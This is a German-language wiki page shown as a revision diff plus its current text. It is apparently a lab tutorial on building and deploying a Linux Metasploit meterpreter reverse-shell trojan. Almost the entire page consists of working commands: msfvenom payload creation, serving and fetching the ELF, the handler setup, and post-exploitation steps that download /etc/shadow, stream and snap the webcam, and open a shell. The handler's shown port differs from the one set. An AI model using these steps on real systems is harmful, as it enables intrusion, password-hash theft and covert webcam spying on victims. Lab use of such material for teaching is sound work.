Metasploit trojaner linux: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
|||
| (30 dazwischenliegende Versionen von 3 Benutzern werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| − | = | + | =Create payload= |
| − | *msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10. | + | *msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f elf > shell.elf |
| − | * | + | *chmod +x shell.elf |
| − | + | *python -m http.server 2222 | |
| − | * | ||
| − | = | + | =get Payload on the target computer an start= |
| + | *wget http://10.0.10.101:2222/shell.elf | ||
| + | oder | ||
| + | *scp xinux@10.0.10.101:/var/www/html/shell.elf . | ||
| + | |||
| + | =Launch Console= | ||
*msfconsole | *msfconsole | ||
<pre> | <pre> | ||
| Zeile 21: | Zeile 25: | ||
*msf > use exploit/multi/handler | *msf > use exploit/multi/handler | ||
*msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp | *msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp | ||
| − | *msf exploit(handler) > set LHOST 10. | + | *msf exploit(handler) > set LHOST 10.0.10.101 |
| − | LHOST => 10. | + | LHOST => 10.0.10.101 |
| − | *msf exploit(handler) > set LPORT | + | *msf exploit(handler) > set LPORT 4444 |
| − | LPORT => | + | LPORT => 4444 |
| − | = | + | |
| + | =Start the exploits= | ||
*msf exploit(handler) > exploit | *msf exploit(handler) > exploit | ||
[*] Exploit running as background job 0. | [*] Exploit running as background job 0. | ||
| − | [*] Started reverse TCP handler on 10.81.1.91: | + | [*] Started reverse TCP handler on 10.81.1.91:6666 |
| − | = | + | =Viewing the sessions= |
*msf exploit(handler) > sessions | *msf exploit(handler) > sessions | ||
| − | |||
| − | |||
| − | |||
| − | + | =Metapreter File Management= | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | =Metapreter | ||
==pwd== | ==pwd== | ||
*meterpreter > pwd | *meterpreter > pwd | ||
==cd== | ==cd== | ||
*meterpreter > cd .. | *meterpreter > cd .. | ||
| − | *meterpreter > cd | + | *meterpreter > cd /etc |
| + | |||
==Download== | ==Download== | ||
| − | *meterpreter > download | + | *meterpreter > download shadow |
| + | |||
==upload== | ==upload== | ||
| − | *meterpreter > cd | + | *meterpreter > cd /root |
| − | *meterpreter > upload hosts | + | *meterpreter > upload /etc/hosts |
| + | |||
=Webcam= | =Webcam= | ||
==list== | ==list== | ||
| Zeile 75: | Zeile 71: | ||
Webcam shot saved to: /root/PDYSnlbK.jpeg | Webcam shot saved to: /root/PDYSnlbK.jpeg | ||
| − | = | + | =Starting a Shell (No Shell Prompt)= |
*meterpreter > shell | *meterpreter > shell | ||
<pre> | <pre> | ||
| − | Process | + | Process 14779 created. |
| − | Channel | + | Channel 5 created. |
| − | |||
| − | |||
</pre> | </pre> | ||
| − | + | ==Examples Shell== | |
| − | == | + | *ifconfig |
| − | * | + | *route -n |
| − | *route | + | *netstat -ltpn |
| − | *netstat - | + | |
==Quit== | ==Quit== | ||
*STRG+c | *STRG+c | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
=Sysinfo= | =Sysinfo= | ||
*meterpreter > sysinfo | *meterpreter > sysinfo | ||
<pre> | <pre> | ||
| − | Computer | + | Computer : gustavo.xinux.lan |
| − | OS | + | OS : Ubuntu 16.04 (Linux 4.4.0-97-generic) |
| − | Architecture | + | Architecture : x64 |
| − | + | Meterpreter : x64/linux | |
| − | |||
| − | |||
| − | Meterpreter | ||
</pre> | </pre> | ||
| − | = | + | =Abschluss= |
| − | * | + | *quit |
| − | |||
| − | |||
Aktuelle Version vom 15. August 2024, 10:20 Uhr
Create payload
- msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f elf > shell.elf
- chmod +x shell.elf
- python -m http.server 2222
get Payload on the target computer an start
oder
- scp xinux@10.0.10.101:/var/www/html/shell.elf .
Launch Console
- msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.0.10.101
LHOST => 10.0.10.101
- msf exploit(handler) > set LPORT 4444
LPORT => 4444
Start the exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.81.1.91:6666
Viewing the sessions
- msf exploit(handler) > sessions
Metapreter File Management
pwd
- meterpreter > pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting... [*] Preparing player... [*] Opening player at: XZLHwhtQ.html [*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PDYSnlbK.jpeg
Starting a Shell (No Shell Prompt)
- meterpreter > shell
Process 14779 created. Channel 5 created.
Examples Shell
- ifconfig
- route -n
- netstat -ltpn
Quit
- STRG+c
Sysinfo
- meterpreter > sysinfo
Computer : gustavo.xinux.lan OS : Ubuntu 16.04 (Linux 4.4.0-97-generic) Architecture : x64 Meterpreter : x64/linux
Abschluss
- quit